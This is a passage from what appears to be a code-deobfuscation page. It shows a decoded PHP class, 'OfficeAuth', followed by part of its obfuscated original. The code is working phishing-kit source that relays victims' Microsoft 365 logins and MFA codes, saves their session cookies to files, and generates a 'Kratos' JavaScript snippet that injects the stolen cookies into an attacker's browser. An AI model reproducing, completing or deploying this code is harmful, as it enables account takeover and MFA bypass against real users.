                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                ], 
                "form_params" => [ 
                    "type" => "22", 
                    "GeneralVerify" => 
                        "false", 
                    "request" => $this->cc473, 
                    "mfaLastPollStart" => 
                        "1689840142481", 
                    "mfaLastPollEnd" => 
                        "1689840143602", 
                    "mfaAuthMethod" => $cfe83, 
                    "otc" => $d8403, 
                    "login" => $this->Fa736, 
                    "flowToken" => $this->fac50, 
                    "hpgrequestid" => 
                        $this->E423c, 
                    "sacxt" => "", 
                    "hideSmsInMfaProofs" => 
                        "false", 
                    "canary" => $this->B5b07, 
                    "i19" => "28132", 
                ], 
            ] 
        ); 
        goto Dcbf5; 
        f82eb: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto F4820; 
        F718f: 
        preg_match( 
            "/(?<="sProofUpAuthState":")[^"]*/", 
            $A75e0, 
            $e6a8e 
        ); 
        goto d308f; 
        a38ae: 
        $this->cc473 = $Bc3b4; 
        goto D04d4; 
        Ebce6: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto e3231; 
        Bc622: 
        goto e54db; 
        goto f1f6e; 
        Aba68: 
        $Bc3b4 = $Bc3b4[0]; 
        goto E1044; 
        faceb: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto F20b0; 
        e6376: 
        if ( 
            strpos( 
                $A75e0, 
                "ConvergedProofUpRedirect" 
            ) !== false 
        ) { 
            goto Cc712; 
        } 
        goto Ce168; 
        E3964: 
        $E2cb4 = $E2cb4[0]; 
        goto aab9b; 
        D04d4: 
        preg_match( 
            "/(?<="sessionId":")[^"]*/", 
            $A75e0, 
            $E2cb4 
        ); 
        goto E3964; 
        d308f: 
        $e6a8e = $e6a8e[0]; 
        goto Ca303; 
        Ac6ba: 
        $this->fac50 = $ea051; 
        goto ea57a; 
        aab9b: 
        $this->E423c = $E2cb4; 
        goto e2f14; 
        c5150: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto Af1c6; 
        Ef75c: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto ee9dd; 
        B86f4: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto D9760; 
        f1f6e: 
        Cc712: 
        goto e7d2c; 
        D9760: 
        $ef175 = $ef175[0]; 
        goto B4c9d; 
        bdcde: 
        $this->E423c = $E2cb4; 
        goto f82eb; 
        F2ffe: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto Ef75c; 
        C1702: 
        file_put_contents( 
            $this->A20d7 . "/js_" . $this->Fa736 . ".txt", 
            $E3848 
        ); 
        goto e716a; 
        ea57a: 
        $this->B5b07 = $ef175; 
        goto c5150; 
        F20b0: 
        $ef175 = $ef175[0]; 
        goto De3ec; 
        ee811: 
        $E2cb4 = $E2cb4[0]; 
        goto bdcde; 
        Af1c6: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto d26ad; 
        Dcbf5: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto c537c; 
        aa20f: 
        e54db: 
        goto c880d; 
        F3d86: 
        $ea051 = $ea051[0]; 
        goto F718f; 
        e716a: 
    } 
    public function ProcessAuthApp() 
    { 
        goto d4857; 
        B9926: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/common/SAS/ProcessAuth", 
            [ 
                "headers" => [ 
                    "User-Agent" => 
                        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0", 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
                    "Accept-Language" => 
                        "en-US,en;q=0.5", 
                    "Accept-Encoding" => 
                        "gzip, deflate, br", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/login", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Connection" => 
                        "keep-alive", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                ], 
                "form_params" => [ 
                    "type" => "22", 
                    "request" => $this->cc473, 
                    "mfaLastPollStart" => 
                        "1689840142481", 
                    "mfaLastPollEnd" => 
                        "1689840143602", 
                    "mfaAuthMethod" => 
                        "PhoneAppNotification", 
                    "login" => $this->Fa736, 
                    "flowToken" => $this->fac50, 
                    "hpgrequestid" => 
                        $this->E423c, 
                    "sacxt" => "", 
                    "hideSmsInMfaProofs" => 
                        "false", 
                    "canary" => $this->B5b07, 
                    "i19" => "28132", 
                ], 
            ] 
        ); 
        goto F147a; 
        f88f4: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto Dafda; 
        B71cb: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto B63eb; 
        dae7d: 
        $this->B5b07 = $ef175; 
        goto E72da; 
        Cfcff: 
        $this->fac50 = $ea051; 
        goto dae7d; 
        Dafda: 
        $ea051 = $ea051[0]; 
        goto F68fd; 
        Fdd58: 
        $E2cb4 = $E2cb4[0]; 
        goto Ab49c; 
        D08b0: 
        $this->fac50 = $ea051; 
        goto B71cb; 
        b375a: 
        $this->cc473 = $Bc3b4; 
        goto a1ce9; 
        f6157: 
        preg_match( 
            "/(?<="sessionId":")[^"]*/", 
            $A75e0, 
            $E2cb4 
        ); 
        goto D5ed7; 
        dacf7: 
        preg_match( 
            "/(?<="sCtx":")[^"]*/", 
            $A75e0, 
            $Bc3b4 
        ); 
        goto Ff28b; 
        a63f7: 
        $this->B5b07 = $ef175; 
        goto Cf994; 
        f120e: 
        $D5295 = file_get_contents( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto B61e7; 
        aa521: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto C7265; 
        F90c2: 
        $ef175 = $ef175[0]; 
        goto a63f7; 
        B63eb: 
        $ef175 = $ef175[0]; 
        goto Afa3a; 
        a52b4: 
        $Accd6 = $Bcc9d->request( 
            "POST", 
            "https://login.microsoftonline.com/kmsi", 
            [ 
                "headers" => [ 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Cache-Control" => 
                        "max-age=0", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/login", 
                    "Sec-CH-UA" => 
                        ""Microsoft Edge";v="129", "Not=A?Brand";v="8", "Chromium";v="129"", 
                    "Sec-CH-UA-Mobile" => 
                        "?0", 
                    "Sec-CH-UA-Platform" => 
                        ""Windows"", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "Sec-Fetch-User" => 
                        "?1", 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0", 
                ], 
                "form_params" => [ 
                    "LoginOptions" => 
                        "1", 
                    "type" => "28", 
                    "ctx" => $this->cc473, 
                    "hpgrequestid" => 
                        $this->ad1e3, 
                    "flowToken" => $this->fac50, 
                    "DontShowAgain" => 
                        "true", 
                    "canary" => $this->B5b07, 
                    "i19" => "14108", 
                ], 
            ] 
        ); 
        goto d3d63; 
        F68fd: 
        preg_match( 
            "/(?<="sProofUpAuthState":")[^"]*/", 
            $A75e0, 
            $e6a8e 
        ); 
        goto c2c61; 
        Eb5e3: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto cdd97; 
        Afa3a: 
        $this->B5b07 = $ef175; 
        goto b546a; 
        Cf858: 
        $ef175 = $ef175[0]; 
        goto Cfcff; 
        C7265: 
        if ( 
            strpos( 
                $A75e0, 
                "ConvergedProofUpRedirect" 
            ) !== false 
        ) { 
            goto Ad0e2; 
        } 
        goto A52ec; 
        C292c: 
        $ea051 = $ea051[0]; 
        goto b61c4; 
        Cf994: 
        e18be: 
        goto a52b4; 
        A26b2: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto C292c; 
        B575d: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto E1701; 
        A52ec: 
        preg_match( 
            "/(?<="sCtx":")[^"]*/", 
            $A75e0, 
            $Bc3b4 
        ); 
        goto A240d; 
        ce2b9: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto Cf858; 
        d3d63: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto d1529; 
        caaf7: 
        preg_match( 
            "/(?<="canary":")[^"]*/", 
            $A75e0, 
            $ef175 
        ); 
        goto F90c2; 
        c2c61: 
        $e6a8e = $e6a8e[0]; 
        goto ce2b9; 
        a1ce9: 
        preg_match( 
            "/(?<="sessionId":")[^"]*/", 
            $A75e0, 
            $E2cb4 
        ); 
        goto Fdd58; 
        d4857: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto A14bc; 
        fb6a5: 
        preg_match( 
            "/(?<="sFT":")[^"]*/", 
            $A75e0, 
            $ea051 
        ); 
        goto c0271; 
        d2e5d: 
        $this->E423c = $E2cb4; 
        goto fb6a5; 
        A14bc: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto B9926; 
        A240d: 
        $Bc3b4 = $Bc3b4[0]; 
        goto be831; 
        b61c4: 
        $this->fac50 = $ea051; 
        goto caaf7; 
        F147a: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto aa521; 
        B61e7: 
        $E3848 = 
            "(function() {
\x9				let cookies = JSON.parse(`" . 
            $D5295 . 
            "`);\xd\xa	\x9\x9\x9\xd
			\x9\x9function putCookie(key, value, domain, path, isSecure) {
\xa	\x9	\x9\x9\x9const cookieMaxAge = "Max-Age=31536000";
\xa		\x9	\x9\x9if (key.startsWith("__Host")) {\xd\xa	\x9	\x9			console.log("==== Kratos ====>", key, value);
	\x9\x9	\x9\x9\x9document.cookie = `${key}=${value};${cookieMaxAge};path=/;Secure;SameSite=None`;\xd
\x9	\x9\x9	\x9} else if (key.startsWith("__Secure")) {
\xa\x9\x9\x9\x9		\x9console.log("==== Kratos ====>", key, value);
\xa\x9\x9\x9				document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};Secure;SameSite=None`;\xd\xa		\x9\x9		} else {\xd
	\x9\x9\x9		\x9if (isSecure) {
\x9\x9\x9\x9\x9\x9\x9	console.log("==== Kratos ====>", key, value);\xd
	\x9					\x9if (window.location.hostname == domain) {\xd
			\x9\x9\x9\x9		document.cookie = `${key}=${value};${cookieMaxAge}; path=${path}; Secure; SameSite=None`;\xd
\x9\x9	\x9			\x9} else {
\x9	\x9\x9\x9\x9\x9\x9	document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};Secure;SameSite=None`;
\xa				\x9			}
\xa\x9		\x9	\x9\x9} else {\xd\xa\x9\x9\x9\x9	\x9\x9	console.log("==== Kratos ====>", key, value);\xd\xa	\x9\x9\x9\x9			if (window.location.hostname == domain) {\xd\xa		\x9\x9\x9\x9\x9		document.cookie = `${key}=${value};${cookieMaxAge};path=${path};`;\xd\xa\x9	\x9\x9			\x9} else {\xd\xa\x9\x9\x9\x9\x9	\x9	\x9document.cookie = `${key}=${value};${cookieMaxAge};domain=${domain};path=${path};`;\xd
	\x9	\x9\x9\x9\x9\x9}\xd\xa		\x9			\x9}\xd
	\x9	\x9		}\xd\xa		\x9\x9\x9}
\x9	\x9		for (let cookie of cookies) {
			\x9	\x9putCookie(cookie.Name, cookie.Value, cookie.Domain, cookie.Path, cookie.Secure);\xd
	\x9\x9	\x9}\xd\xa\x9	\x9\x9}());"; 
        goto Dacb6; 
        Ff28b: 
        $Bc3b4 = $Bc3b4[0]; 
        goto b375a; 
        d1529: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto f120e; 
        D5ed7: 
        $E2cb4 = $E2cb4[0]; 
        goto d2e5d; 
        Dacb6: 
        file_put_contents( 
            $this->A20d7 . 
                "/js_" . 
                $this->Fa736 . 
                ".txt", 
            $E3848 
        ); 
        goto e7078; 
        cdd97: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto dacf7; 
        E1701: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/common/resume", 
            [ 
                "query" => [ 
                    "skipmfaregistration" => 
                        "1", 
                ], 
                "headers" => [ 
                    "User-Agent" => 
                        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0", 
                    "Accept" => 
                        "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
                    "Accept-Language" => 
                        "en-US,en;q=0.5", 
                    "Accept-Encoding" => 
                        "gzip, deflate, br", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/SAS/ProcessAuth", 
                    "Content-Type" => 
                        "application/x-www-form-urlencoded", 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Connection" => 
                        "keep-alive", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Upgrade-Insecure-Requests" => 
                        "1", 
                    "Sec-Fetch-Dest" => 
                        "document", 
                    "Sec-Fetch-Mode" => 
                        "navigate", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "Sec-Fetch-User" => 
                        "?1", 
                    "TE" => "trailers", 
                ], 
                "form_params" => [ 
                    "flowToken" => $this->{$ea051}, 
                    "ctx" => $e6a8e, 
                    "canary" => $this->{$ef175}, 
                ], 
            ] 
        ); 
        goto Eb5e3; 
        be831: 
        $this->cc473 = $Bc3b4; 
        goto f6157; 
        c0271: 
        $ea051 = $ea051[0]; 
        goto D08b0; 
        E9bb3: 
        Ad0e2: 
        goto f88f4; 
        E72da: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto B575d; 
        Ab49c: 
        $this->E423c = $E2cb4; 
        goto A26b2; 
        b546a: 
        goto e18be; 
        goto E9bb3; 
        e7078: 
    } 
    public function BeginAuth($C19e5) 
    { 
        goto D6bce; 
        Cfdd7: 
        D8b9b: 
        goto f00ee; 
        F3090: 
        if ( 
            strpos( 
                $A75e0, 
                ""Success":true" 
            ) !== false 
        ) { 
            goto D6f37; 
        } 
        goto b2159; 
        bd531: 
        $this->redirect(); 
        goto Bb442; 
        E6fbc: 
        D6f37: 
        goto Ee1e0; 
        f00ee: 
        $de1ca = "PhoneAppOTP"; 
        goto B02a6; 
        d4b9c: 
        $this->B522d = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["api_canary"]; 
        goto ca85e; 
        Fc75a: 
        fd893: 
        goto a3063; 
        e9075: 
        goto bb415; 
        goto Cfdd7; 
        e3e0c: 
        goto f4f49; 
        goto E6fbc; 
        B02a6: 
        bb415: 
        goto d6e87; 
        A9fc5: 
        goto D57ff; 
        goto Ffcd2; 
        a3063: 
        f4f49: 
        goto dcc18; 
        D6bce: 
        if ( 
            !( 
                $this->Fa736 != $_SESSION["email"] || 
                !isset($_SESSION["status"]) || 
                !isset( 
                    $_SESSION[ 
                        "info_token_2fa" 
                    ] 
                ) 
            ) 
        ) { 
            goto C37fe; 
        } 
        goto bd531; 
        Bb442: 
        C37fe: 
        goto ee76d; 
        c54fb: 
        $this->cc473 = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["sCtx"]; 
        goto d4b9c; 
        E72f9: 
        $Bcc9d = new Client(["cookies" => $F16be]); 
        goto B315f; 
        Ee1e0: 
        $this->status[ 
            "2fa_beginauth" 
        ] = true; 
        goto A6ed6; 
        d4e30: 
        $de1ca = "OneWaySMS"; 
        goto f3960; 
        a207b: 
        $this->A20d7 = getcwd() . "/core"; 
        goto Abc1e; 
        B315f: 
        $Accd6 = $Bcc9d->post( 
            "https://login.microsoftonline.com/common/SAS/BeginAuth", 
            [ 
                "headers" => [ 
                    "Accept" => 
                        "application/json", 
                    "Accept-Language" => 
                        "en-US,en;q=0.9", 
                    "Connection" => 
                        "keep-alive", 
                    "Content-Type" => 
                        "application/json; charset=UTF-8", 
                    "Cookie" => $this->gencook( 
                        $this->A20d7 . 
                            "/cookie_" . 
                            $this->Fa736 . 
                            ".txt" 
                    ), 
                    "Origin" => 
                        "https://login.microsoftonline.com", 
                    "Referer" => 
                        "https://login.microsoftonline.com/common/login", 
                    "Sec-Fetch-Dest" => 
                        "empty", 
                    "Sec-Fetch-Mode" => 
                        "cors", 
                    "Sec-Fetch-Site" => 
                        "same-origin", 
                    "User-Agent" => 
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36", 
                    "Canary" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["api_canary"], 
                    "Client-Request-Id" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["request_id"], 
                    "Hpgact" => "2000", 
                    "Hpgid" => "1114", 
                    "Hpgrequestid" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["session_id"], 
                    "Sec-Ch-Ua" => 
                        ""Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"", 
                    "Sec-Ch-Ua-Mobile" => 
                        "?0", 
                    "Sec-Ch-Ua-Platform" => 
                        ""Windows"", 
                ], 
                "json" => [ 
                    "AuthMethodId" => $de1ca, 
                    "Method" => 
                        "BeginAuth", 
                    "ctx" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["sCtx"], 
                    "flowToken" => 
                        $_SESSION[ 
                            "info_token_2fa" 
                        ]["sFT"], 
                ], 
            ] 
        ); 
        goto b7f59; 
        Ffcd2: 
        E65d0: 
        goto eebb5; 
        Fc905: 
        $this->ad1e3 = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["request_id"]; 
        goto D6b85; 
        a69f6: 
        D57ff: 
        goto e9075; 
        cd671: 
        $this->status["entropy"] = 
            $b0338["Entropy"]; 
        goto Fc75a; 
        D6b85: 
        if (!($C19e5 == "verify_app")) { 
            goto fd893; 
        } 
        goto cd671; 
        cb448: 
        $this->fac50 = $b0338["FlowToken"]; 
        goto c54fb; 
        A6ed6: 
        $b0338 = json_decode($A75e0, true); 
        goto cb448; 
        d4355: 
        if ($C19e5 == "verify_app") { 
            goto E65d0; 
        } 
        goto a450a; 
        ca85e: 
        $this->B5b07 = 
            $_SESSION[ 
                "info_token_2fa" 
            ]["canary"]; 
        goto c3b48; 
        C64fd: 
        $A75e0 = $Accd6->getBody()->getContents(); 
        goto F3090; 
        b2159: 
        $this->status[ 
            "2fa_beginauth" 
        ] = false; 
        goto e3e0c; 
        Abc1e: 
        if ($C19e5 == "verify_code") { 
            goto D8b9b; 
        } 
        goto d4355; 
        ee76d: 
        $this->status = $_SESSION["status"]; 
        goto a207b; 
        f3960: 
        Ce695: 
        goto A9fc5; 
        c3b48: 
        $this->E423c = $b0338["SessionId"]; 
        goto Fc905; 
        a450a: 
        if (!($C19e5 == "verify_sms")) { 
            goto Ce695; 
        } 
        goto d4e30; 
        b7f59: 
        $F16be->save( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt" 
        ); 
        goto C64fd; 
        d6e87: 
        $F16be = new FileCookieJar( 
            $this->A20d7 . 
                "/cookie_" . 
                $this->Fa736 . 
                ".txt", 
            true 
        ); 
        goto E72f9; 
        eebb5: 
        $de1ca = 
            "PhoneAppNotification"; 
        goto a69f6; 
        dcc18: 
    } 
} 
 ?>

Did this file decode correctly?

Original Code

<?php
/*   Important Notice
        Any unauthorized use of this content may lead to significant damage. This includes, but is not limited to, loss of revenue, reputational harm, and legal repercussions. By accessing this material, you agree to use it responsibly and understand that any misuse could result in consequences.
        
        Please respect the rights associated with this work.
        */
require "\x76\x65\156\144\157\162\57\x61\x75\x74\x6f\x6c\x6f\141\x64\x2e\160\150\x70";
use GuzzleHttp\Client;
use GuzzleHttp\Cookie\CookieJar;
use GuzzleHttp\Cookie\FileCookieJar;
class OfficeAuth
{
    public $Fa736;
    public $Ed558;
    public $status = [];
    public $fac50;
    public $cc473;
    public $B5b07;
    public $B522d;
    public $E423c;
    public $ad1e3;
    public $be01c;
    public $D2b25;
    public $A20d7;
    public function __construct()
    {
        goto d409c;
        F8f93:
        $this->status["\x74\x79\x70\145"] = null;
        goto E44f9;
        ed9e5:
        $this->status["\162\157\x6c\145"] = false;
        goto F8f93;
        B788b:
        $this->status["\x69\143\x6f\x6e"] = null;
        goto c82d1;
        d409c:
        $this->status["\154\151\x76\x65"] = false;
        goto B50d0;
        caf64:
        $this->status["\142\x61\x63\153\147\162\157\165\156\x64"] = null;
        goto B788b;
        B50d0:
        $this->status["\x65\144\x75"] = false;
        goto ed9e5;
        E44f9:
        $this->status["\x72\145\x64\151\162\x65\x63\164"] = null;
        goto caf64;
        c82d1:
    }
    public function extractCookies($Be70a)
    {
        goto bb0c1;
        Dca25:
        bdaf0:
        goto a9cdc;
        bb0c1:
        $d6c0e = [];
        goto d332b;
        a9cdc:
        return $d6c0e;
        goto e7c02;
        A77ee:
        foreach ($e6c5c as $a6312) {
            goto Da8d7;
            ab6ad:
            bbcca:
            goto B9254;
            aad9d:
            $D5295 = [
                "\x6e\x61\x6d\x65" => $E4707[5],
                "\166\x61\154\165\x65" => $E4707[6],
                "\x65\x78\x70\x69\162\x61\164\151\157\156\104\141\x74\x65" => strtotime(
                    "\x2b\61\x20\x79\x65\141\162"
                ),
                "\144\x6f\155\141\151\x6e" => $a6316,
                "\160\x61\164\x68" => $E4707[2],
                "\163\141\155\145\x53\151\x74\x65" => "\x6e\157\x6e\x65",
                "\x66\x69\162\x73\164\120\x61\x72\164\171\x44\x6f\155\x61\x69\156" =>
                    "",
                "\x68\x6f\163\x74\157\x6e\x6c\171" => false,
                "\x73\145\143\x75\x72\145" => (bool) $E4707[3],
                "\x68\x74\164\x70\x6f\156\154\x79" => true,
                "\x73\x65\163\163\151\157\x6e" => true,
                "\x70\141\162\x74\151\x74\x69\157\156\x4b\x65\171" => null,
                "\163\164\157\162\x65\x49\x64" => null,
            ];
            goto Bd182;
            Eace2:
            goto Bc5d0;
            goto A268a;
            A268a:
            d5944:
            goto d4c0a;
            B9254:
            Bc5d0:
            goto C546a;
            d4c0a:
            $a6316 = substr($E4707[0], 10);
            goto Cd3aa;
            F2f98:
            $E4707 = explode("\x9", trim($a6312));
            goto Dca03;
            Da8d7:
            if (!(isset($a6312[0]) && substr_count($a6312, "\x9") == 6)) {
                goto bbcca;
            }
            goto F2f98;
            Cd3aa:
            if (
                !(
                    $a6316 ==
                    "\x6f\163\157\146\x74\x6f\x6e\154\x69\x6e\x65\56\x63\157\x6d"
                )
            ) {
                goto bc14b;
            }
            goto C9c51;
            Dca03:
            if (
                !(
                    $E4707[5] == "\145\x73\x63\164\x78" ||
                    $E4707[5] ==
                        "\163\x74\163\163\x65\x72\x76\151\143\145\x63\157\157\153\151\145"
                )
            ) {
                goto d5944;
            }
            goto Eace2;
            C9c51:
            $a6316 =
                "\154\x6f\x67\151\x6e\56\x6d\x69\x63\x72\157\x73\x6f\x66\x74\157\x6e\154\x69\156\x65\56\x63\x6f\x6d";
            goto F5504;
            Bd182:
            $d6c0e[] = $D5295;
            goto ab6ad;
            F5504:
            bc14b:
            goto aad9d;
            C546a:
        }
        goto Dca25;
        d332b:
        $e6c5c = explode("\xa", $Be70a);
        goto A77ee;
        e7c02:
    }
    public function Start()
    {
        goto d8804;
        e00f7:
        preg_match(
            "\x2f\50\x3f\x3c\x3d\x22\163\x46\x54\x22\72\x22\x29\x5b\136\x22\x5d\52\x2f",
            $A75e0,
            $ea051
        );
        goto cd8b9;
        E8ddc:
        $this->B5b07 = $ef175[0];
        goto eb714;
        d74c6:
        $this->ad1e3 = $eb813[0];
        goto F0f14;
        eb714:
        $this->B522d = $a6081[0];
        goto e0bde;
        C0197:
        preg_match(
            "\57\x28\77\x3c\75\x22\x73\145\x73\x73\151\157\156\x49\144\x22\72\42\51\x5b\136\x22\x5d\x2a\x2f",
            $A75e0,
            $D70fc
        );
        goto F9dbd;
        Da8da:
        $Bcc9d = new Client();
        goto c1036;
        E6274:
        $A75e0 = $Accd6->getBody()->getContents();
        goto e00f7;
        Fa214:
        $this->fac50 = $ea051[0];
        goto dc71e;
        c1036:
        $Accd6 = $Bcc9d->get(
            "\x68\164\164\160\x73\72\57\57\154\157\x67\x69\x6e\x2e\x6d\x69\x63\162\157\163\x6f\x66\x74\x6f\156\x6c\x69\x6e\145\56\143\157\155\x2f",
            [
                "\x68\x65\141\144\x65\162\163" => [
                    "\125\163\x65\x72\x2d\x41\147\145\x6e\164" =>
                        "\x4d\157\172\x69\x6c\x6c\141\57\65\x2e\x30\x20\x28\x4d\x61\143\x69\x6e\164\157\x73\x68\73\40\111\156\x74\145\154\40\115\141\x63\x20\x4f\x53\x20\x58\x20\61\x30\x2e\x31\x35\x3b\40\x72\x76\72\61\x30\71\56\x30\x29\x20\x47\x65\143\x6b\157\x2f\62\x30\61\x30\x30\61\x30\61\x20\106\x69\x72\145\x66\x6f\170\57\x31\61\x33\56\60",
                    "\x41\x63\143\x65\160\164" =>
                        "\x74\145\170\x74\x2f\x68\164\x6d\154\x2c\x61\x70\160\x6c\151\143\141\x74\151\x6f\156\57\x78\150\x74\x6d\154\53\x78\155\x6c\x2c\141\160\160\x6c\151\143\x61\x74\x69\157\x6e\x2f\170\155\x6c\73\161\75\60\x2e\71\54\x69\155\x61\147\x65\x2f\x61\x76\x69\146\x2c\x69\x6d\141\147\145\x2f\x77\x65\x62\160\54\x2a\x2f\52\x3b\161\x3d\x30\x2e\70",
                    "\x41\x63\x63\x65\x70\164\55\114\141\156\147\165\x61\147\x65" =>
                        "\x65\x6e\x2d\x55\x53\54\145\156\73\x71\75\x30\x2e\65",
                    "\101\143\x63\145\x70\x74\x2d\x45\156\143\157\x64\151\x6e\x67" =>
                        "\147\x7a\x69\x70\x2c\40\144\145\146\x6c\x61\x74\145\x2c\40\142\x72",
                    "\x43\157\x6e\x6e\x65\x63\164\151\157\x6e" =>
                        "\x6b\145\x65\x70\55\x61\154\151\x76\145",
                    "\125\160\147\x72\x61\144\x65\x2d\111\156\163\145\143\x75\162\145\x2d\x52\145\x71\165\145\163\x74\x73" =>
                        "\61",
                    "\123\145\143\x2d\106\x65\164\143\x68\x2d\x44\145\163\164" =>
                        "\x64\x6f\143\165\155\x65\156\x74",
                    "\x53\x65\143\55\x46\x65\x74\143\x68\55\115\157\x64\x65" =>
                        "\x6e\x61\166\151\x67\141\164\145",
                    "\123\145\x63\55\x46\x65\164\x63\x68\x2d\123\151\164\145" =>
                        "\x6e\x6f\x6e\x65",
                    "\x53\145\x63\55\106\x65\164\143\150\55\x55\163\145\x72" =>
                        "\77\x31",
                    "\103\157\157\153\x69\x65" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\143\157\x6f\x6b\151\145\137" .
                            $this->Fa736 .
                            "\x2e\164\x78\164"
                    ),
                ],
            ]
        );
        goto Cbac2;
        Cbac2:
        $F16be->save(
            $this->A20d7 .
                "\57\x63\157\x6f\153\151\x65\x5f" .
                $this->Fa736 .
                "\56\x74\170\x74"
        );
        goto E6274;
        F4759:
        preg_match(
            "\57\50\77\x3c\75\x22\141\x70\151\x43\141\156\141\x72\171\42\x3a\x22\51\133\136\x22\x5d\x2a\x2f",
            $A75e0,
            $a6081
        );
        goto C0197;
        e0bde:
        $this->E423c = $D70fc[0];
        goto d74c6;
        cd8b9:
        preg_match(
            "\x2f\x28\77\74\75\42\163\x43\x74\x78\42\72\x22\51\x5b\136\42\135\x2a\x2f",
            $A75e0,
            $Bc3b4
        );
        goto A56a1;
        dc71e:
        $this->cc473 = $Bc3b4[0];
        goto E8ddc;
        F9dbd:
        preg_match(
            "\x2f\x28\77\x3c\75\x22\143\157\162\x72\x65\x6c\141\x74\x69\157\156\111\x64\42\x3a\x22\51\x5b\x5e\42\135\x2a\57",
            $A75e0,
            $eb813
        );
        goto Fa214;
        Db3cd:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\x63\157\x6f\153\x69\145\137" .
                $this->Fa736 .
                "\56\164\170\164",
            true
        );
